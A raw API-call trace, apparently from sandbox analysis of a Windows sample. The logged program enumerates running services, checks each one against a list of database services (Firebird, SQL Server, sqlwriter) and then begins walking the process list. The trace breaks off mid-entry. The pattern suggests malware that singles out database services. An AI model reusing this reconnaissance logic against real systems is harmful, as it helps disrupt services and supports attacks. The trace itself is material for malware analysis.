[0061.212] Sleep (dwMilliseconds=0x1f4) [0062.623] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ed18 [0062.624] EnumServicesStatusExW (in: hSCManager=0x60ed18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0062.624] GetLastError () returned 0xea [0062.624] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1d5a) returned 0x43c20f8 [0062.625] EnumServicesStatusExW (in: hSCManager=0x60ed18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x43c20f8, cbBufSize=0x1d5a, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x43c20f8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0062.625] CloseServiceHandle (hSCObject=0x60ed18) returned 1 [0062.626] lstrlenW (lpString="Appinfo") returned 7 [0062.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0062.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0062.626] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0062.626] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0062.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0062.626] lstrlenW (lpString="AppXSvc") returned 7 [0062.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0062.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0062.626] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0062.626] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0062.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0062.626] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0062.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0062.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0062.626] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0062.626] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0062.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0062.626] lstrlenW (lpString="Audiosrv") returned 8 [0062.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0062.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0062.627] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0062.627] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0062.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0062.627] lstrlenW (lpString="BFE") returned 3 [0062.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0062.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0062.627] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0062.627] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0062.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0062.627] lstrlenW (lpString="BITS") returned 4 [0062.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0062.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0062.627] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0062.627] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0062.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0062.627] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0062.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0062.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0062.627] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0062.627] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0062.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0062.627] lstrlenW (lpString="CDPSvc") returned 6 [0062.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0062.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0062.627] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0062.627] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0062.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0062.627] lstrlenW (lpString="ClickToRunSvc") returned 13 [0062.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0062.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0062.627] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0062.627] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0062.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0062.627] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0062.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0062.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0062.627] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0062.628] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0062.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0062.628] lstrlenW (lpString="CryptSvc") returned 8 [0062.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0062.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0062.628] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0062.628] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0062.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0062.628] lstrlenW (lpString="DcomLaunch") returned 10 [0062.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0062.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0062.628] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0062.628] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0062.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0062.628] lstrlenW (lpString="DeviceAssociationService") returned 24 [0062.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0062.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0062.628] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0062.628] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0062.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0062.628] lstrlenW (lpString="Dhcp") returned 4 [0062.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0062.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0062.628] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0062.628] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0062.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0062.628] lstrlenW (lpString="Dnscache") returned 8 [0062.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0062.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0062.628] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0062.628] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0062.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0062.628] lstrlenW (lpString="DoSvc") returned 5 [0062.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0062.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0062.629] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0062.629] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0062.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0062.629] lstrlenW (lpString="DPS") returned 3 [0062.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0062.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0062.629] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0062.629] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0062.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0062.629] lstrlenW (lpString="DusmSvc") returned 7 [0062.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0062.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0062.629] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0062.629] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0062.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0062.629] lstrlenW (lpString="EventLog") returned 8 [0062.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0062.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0062.629] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0062.629] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0062.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0062.629] lstrlenW (lpString="EventSystem") returned 11 [0062.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0062.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0062.629] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0062.629] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0062.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0062.629] lstrlenW (lpString="FontCache") returned 9 [0062.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0062.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0062.629] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0062.629] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0062.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0062.688] lstrlenW (lpString="gpsvc") returned 5 [0062.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0062.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0062.688] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0062.688] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0062.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0062.688] lstrlenW (lpString="iphlpsvc") returned 8 [0062.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0062.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0062.688] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0062.688] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0062.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0062.688] lstrlenW (lpString="KeyIso") returned 6 [0062.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0062.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0062.688] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0062.688] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0062.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0062.688] lstrlenW (lpString="LanmanServer") returned 12 [0062.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0062.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0062.688] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0062.688] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0062.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0062.688] lstrlenW (lpString="LanmanWorkstation") returned 17 [0062.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0062.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0062.688] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0062.688] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0062.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0062.688] lstrlenW (lpString="lfsvc") returned 5 [0062.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0062.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0062.689] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0062.689] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0062.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0062.689] lstrlenW (lpString="lmhosts") returned 7 [0062.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0062.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0062.689] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0062.689] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0062.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0062.689] lstrlenW (lpString="LSM") returned 3 [0062.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0062.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0062.689] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0062.689] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0062.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0062.689] lstrlenW (lpString="MapsBroker") returned 10 [0062.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MapsBroker") returned -1 [0062.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MapsBroker") returned -1 [0062.689] lstrcmpiW (lpString1="sqlwriter", lpString2="MapsBroker") returned 1 [0062.689] lstrcmpiW (lpString1="mssqlserver", lpString2="MapsBroker") returned 1 [0062.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MapsBroker") returned 1 [0062.689] lstrlenW (lpString="MpsSvc") returned 6 [0062.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0062.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0062.689] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0062.689] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0062.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0062.689] lstrlenW (lpString="NcbService") returned 10 [0062.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0062.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0062.690] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0062.690] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0062.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0062.690] lstrlenW (lpString="netprofm") returned 8 [0062.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0062.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0062.690] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0062.690] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0062.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0062.690] lstrlenW (lpString="NlaSvc") returned 6 [0062.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0062.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0062.690] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0062.690] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0062.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0062.690] lstrlenW (lpString="nsi") returned 3 [0062.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0062.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0062.690] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0062.690] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0062.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0062.690] lstrlenW (lpString="PcaSvc") returned 6 [0062.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0062.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0062.690] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0062.690] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0062.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0062.690] lstrlenW (lpString="PlugPlay") returned 8 [0062.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0062.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0062.690] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0062.691] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0062.691] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0062.691] lstrlenW (lpString="Power") returned 5 [0062.691] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0062.691] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0062.691] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0062.691] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0062.691] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0062.691] lstrlenW (lpString="ProfSvc") returned 7 [0062.691] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0062.691] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0062.691] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0062.691] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0062.691] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0062.691] lstrlenW (lpString="RpcEptMapper") returned 12 [0062.691] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0062.691] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0062.691] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0062.691] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0062.691] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0062.691] lstrlenW (lpString="RpcSs") returned 5 [0062.691] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0062.691] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0062.691] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0062.691] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0062.691] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0062.691] lstrlenW (lpString="SamSs") returned 5 [0062.691] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0062.691] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0062.691] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0062.691] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0062.692] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0062.692] lstrlenW (lpString="Schedule") returned 8 [0062.692] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0062.692] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0062.692] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0062.692] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0062.692] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0062.692] lstrlenW (lpString="SecurityHealthService") returned 21 [0062.692] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0062.692] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0062.692] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0062.692] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0062.692] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0062.692] lstrlenW (lpString="SENS") returned 4 [0062.692] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0063.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0063.224] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0063.224] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0063.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0063.224] lstrlenW (lpString="ShellHWDetection") returned 16 [0063.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0063.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0063.224] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0063.224] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0063.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0063.224] lstrlenW (lpString="Spooler") returned 7 [0063.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0063.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0063.224] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0063.224] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0063.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0063.224] lstrlenW (lpString="SSDPSRV") returned 7 [0063.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0063.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0063.224] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0063.224] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0063.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0063.224] lstrlenW (lpString="StateRepository") returned 15 [0063.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0063.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0063.225] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0063.225] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0063.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0063.225] lstrlenW (lpString="SysMain") returned 7 [0063.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0063.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0063.225] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0063.225] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0063.225] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c20f8 | out: hHeap=0x5d0000) returned 1 [0063.225] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x340 [0063.229] Process32FirstW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0063.230] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0063.230] lstrlenW (lpString="System") returned 6 [0063.231] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0063.231] lstrlenW (lpString="smss.exe") returned 8 [0063.231] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0063.232] lstrlenW (lpString="csrss.exe") returned 9 [0063.232] Process32NextW (in: hSnapshot=0x340, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, 